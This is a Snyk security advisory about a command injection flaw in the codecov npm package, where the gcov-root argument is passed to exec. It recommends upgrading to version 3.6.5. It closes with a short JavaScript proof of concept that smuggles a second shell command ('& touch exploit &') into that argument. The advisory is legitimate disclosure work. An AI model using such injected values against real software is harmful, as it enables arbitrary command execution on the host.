Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade codecov
to version 3.6.5 or higher.
codecov is a npm package for uploading reports to Codecov.
Affected versions of this package are vulnerable to Command Injection. The value provided as part of the gcov-root
argument is executed by the exec
function within lib/codecov.js. This vulnerability exists due to an incomplete fix of CVE-2020-7596.
var root = require("codecov");
var args = {
"options": {
'gcov-root': "& touch exploit &",
'gcov-exec': ' ',
'gcov-args': ' '
}
}
root.handleInput.upload(args, function(){}, function(){});